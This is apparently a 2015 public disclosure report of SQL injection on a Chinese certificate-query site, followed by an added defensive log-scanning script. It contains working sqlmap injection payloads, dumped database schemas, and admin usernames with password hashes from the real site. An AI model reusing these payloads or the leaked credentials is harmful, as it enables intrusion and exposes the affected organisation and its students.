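2015-09-15: Details reported to the vendor; awaiting vendor handling
2015-09-17: CNCERT (National Internet Emergency Center) has not yet been able to contact the organization concerned; details disclosed only to the notified agencies
2015-09-27: Details disclosed to core white hats and experts in related fields
2015-10-07: Details disclosed to regular white hats
2015-10-17: Details disclosed to intern white hats
2015-11-01: Details disclosed to the public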
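SQL injection in the China Certificate Query Network (中国证书查询网) leaks a large amount of important information...
Through the injection vulnerability, a large amount of important site information can be dumped, including the administrator accounts and passwords; the passwords could not be cracked, however, so no further testing was possible... Injection point: http://**.**.**.**/online_join.asp?cid=1 There are as many as 16 databases...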
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cid
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
    Payload: cid=(SELECT (CASE WHEN (8709=8709) THEN 1 ELSE 8709*(SELECT 8709 FROM master..sysdatabases) END))

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: cid=1 AND 4384=CONVERT(INT,(CHAR(58) CHAR(97) CHAR(99) CHAR(119) CHAR(58) (SELECT (CASE WHEN (4384=4384) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(100) CHAR(113) CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: cid=-3936 UNION ALL SELECT CHAR(58) CHAR(97) CHAR(99) CHAR(119) CHAR(58) CHAR(82) CHAR(65) CHAR(80) CHAR(78) CHAR(72) CHAR(116) CHAR(82) CHAR(85) CHAR(75) CHAR(78) CHAR(58) CHAR(111) CHAR(100) CHAR(113) CHAR(58),NULL--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: cid=(SELECT CHAR(58) CHAR(97) CHAR(99) CHAR(119) CHAR(58) (SELECT (CASE WHEN (7556=7556) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(100) CHAR(113) CHAR(58))
---
[20:13:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[20:13:49] [INFO] fetching database names
[20:13:50] [INFO] the SQL query used returns 16 entries
available databases [16]:
[*] 360beikao
[*] 86690003_201311
[*] 86690003_201411
[*] 86690003_com
[*] baodicanyin
[*] beixinyuan
[*] cnzscxdata
[*] cnzscxdata_2015
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] ShangHui
[*] tempdb
[*] xueyuan
current database: 'cnzscxdata'
current user: 'cnzscxdata_u'

7 users:
[20:15:29] [INFO] the SQL query used returns 7 entries
[20:15:29] [INFO] retrieved: "86690003_com"
[20:15:30] [INFO] retrieved: "baodicanyin"
[20:15:30] [INFO] retrieved: "BUILTIN\\\\Administrators"
[20:15:30] [INFO] retrieved: "cnzscxdata_u"
[20:15:31] [INFO] retrieved: "sa"
[20:15:31] [INFO] retrieved: "shanghui"
[20:15:32] [INFO] retrieved: "SUPERNIC-56FF19\\\\SQLDEBUGGER"
database management system users [7]:
[*] 86690003_com
[*] baodicanyin
[*] BUILTIN\\Administrators
[*] cnzscxdata_u
[*] sa
[*] shanghui
[*] SUPERNIC-56FF19\\SQLDEBUGGER
The database contains a large amount of sensitive student information...
Database: cnzscxdata
[34 tables]
+---------------------------+
| dtproperties              |
| icetu_Admin               |
| icetu_Advertisement       |
| icetu_Cert                |
| icetu_CertSample          |
| icetu_City                |
| icetu_College             |
| icetu_Number              |
| icetu_Province            |
| icetu_RecruitStudentsInfo |
| icetu_UserMessage         |
| icetu_activeText          |
| icetu_adChannal           |
| icetu_join                |
| icetu_manager             |
| icetu_news                |
| icetu_regUser             |
| icetu_renzheng            |
| kk358_Admin               |
| kk358_Agencies            |
| kk358_Application         |
| kk358_ApplicationOrders   |
| kk358_Courses             |
| kk358_Messages            |
| kk358_MigrationClients    |
| kk358_News                |
| kk358_RegisteredCourses   |
| kk358_Schedule            |
| kk358_Schools             |
| kk358_StayHomes           |
| kk358_Students            |
| kk358_Travel              |
| sysconstraints            |
| syssegments               |
+---------------------------+

Database: cnzscxdata
Table: icetu_Admin
[7 columns]
+------------------+---------------+
| Column           | Type          |
+------------------+---------------+
| CurrentLoginIP   | nvarchar      |
| CurrentLoginTime | smalldatetime |
| Flag             | nvarchar      |
| LastLoginIP      | nvarchar      |
|
| PassWord         | nvarchar      |
| UserName         | nvarchar      |
+------------------+---------------+

Database: cnzscxdata
Table: kk358_Students
[20 columns]
+-----------------+---------------+
| Column          | Type          |
+-----------------+---------------+
| AgentId         | int           |
| AreaId          | int           |
| AsscNo          | nvarchar      |
| BirthDay        | smalldatetime |
| ContactPersonId | int           |
| ContactPhone    | nvarchar      |
| CreateDate      | smalldatetime |
| CreateUser      | nvarchar      |
| CurrentUser     | nvarchar      |
| Email           | nvarchar      |
| ExpireDate      | smalldatetime |
| FullName        | nvarchar      |
| GraduationDate  | nvarchar      |
| id              | int           |
| LastUpdateDate  | smalldatetime |
| LastUpdateUser  | nvarchar      |
| Mobile          | nvarchar      |
| PassportNo      | nvarchar      |
| Telephone       | nvarchar      |
| VisaType        | nvarchar      |
+-----------------+---------------+

Database: cnzscxdata
Table: kk358_Admin
[12 columns]
+------------------+---------------+
| Column           | Type          |
+------------------+---------------+
| AreaId           | nvarchar      |
| BrowseFlag       | int           |
| CurrentLoginIP   | nvarchar      |
| CurrentLoginTime | smalldatetime |
| Flag             | nvarchar      |
| ID               | int           |
| LastLoginIP      | nvarchar      |
| LastLoginTime    | smalldatetime |
| Options          | nvarchar      |
| PassWord         | nvarchar      |
| UserGroup        | tinyint       |
| UserName         | nvarchar      |
+------------------+---------------+

Database: cnzscxdata
Table: kk358_Admin
[6 entries]
+------------+------------------+-----------+
| UserName   | PassWord         | UserGroup |
+------------+------------------+-----------+
| accountant | 21e09df36d23bf1c | 3         |
| admin      | 3144d570f6b2bf3b | 0         |
| newuser    | 42b452ccbe28c89e | 0         |
| OMSyd      | a9921913b1d203b0 | 2         |
| GMSyd      | b94e3172b87abc2b | 1         |
| officer    | cbf64331dddd69eb | 4         |
+------------+------------------+-----------+
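That's all for now...
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-09-17 15:32
CNVD confirmed and reproduced the issue as described, and has notified the site's administrators by e-mail through their publicly listed contact channel.
None yet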
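Added example (not part of the original report and not the site's code): a check a defender could run over the web server's W3C-format access logs to flag requests to online_join.asp whose cid value is not a plain integer, labelling which of the four sqlmap payload families shown above it resembles. The log field layout, function names, IP addresses, timestamps and shortened payloads are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Signatures modelled on the four sqlmap payload families listed in the report.
# Order matters: the boolean-blind payload also begins with "(SELECT".
SIGNATURES = [
    ("union", re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I)),
    ("error-based", re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I)),
    ("boolean-blind", re.compile(r"\bCASE\s+WHEN\b.*\bsysdatabases\b", re.I | re.S)),
    ("inline-query", re.compile(r"^\s*\(\s*SELECT\b", re.I)),
]

def classify_cid(query):
    """Return None if every cid value is a plain integer, else a label."""
    for value in parse_qs(query, keep_blank_values=True).get("cid", []):
        if re.fullmatch(r"\d{1,9}", value):
            continue
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                return label
        return "non-integer"  # no known payload shape, but still not a valid id
    return None

def scan_log(lines, page="/online_join.asp"):
    """Scan W3C log lines and return [(client_ip, label), ...] for the page."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names declared by the log itself
            continue
        if line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-uri-stem", "").lower() != page:
            continue
        label = classify_cid(row.get("cs-uri-query", ""))
        if label:
            hits.append((row.get("c-ip", "-"), label))
    return hits

# Constructed sample log: documentation IP ranges, payloads shortened.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2015-01-01 10:00:00 192.0.2.10 GET /online_join.asp cid=1 200
2015-01-01 10:00:01 203.0.113.7 GET /online_join.asp cid=1+AND+4384=CONVERT(INT,(CHAR(58)%2BCHAR(97))) 500
2015-01-01 10:00:02 203.0.113.7 GET /online_join.asp cid=-3936+UNION+ALL+SELECT+CHAR(58),NULL-- 200
2015-01-01 10:00:03 203.0.113.7 GET /online_join.asp cid=(SELECT+(CASE+WHEN+(8709=8709)+THEN+1+ELSE+8709*(SELECT+8709+FROM+master..sysdatabases)+END)) 200
2015-01-01 10:00:04 203.0.113.7 GET /online_join.asp cid=(SELECT+CHAR(58)%2B(SELECT+(CASE+WHEN+(7556=7556)+THEN+CHAR(49)+ELSE+CHAR(48)+END))) 200
2015-01-01 10:00:05 192.0.2.12 GET /online_join.asp cid=12abc 200
""".splitlines()
```

The same integer-only rule applied to cid inside the page itself, together with a parameterized query, removes the injection point; the log check only shows where it has been probed.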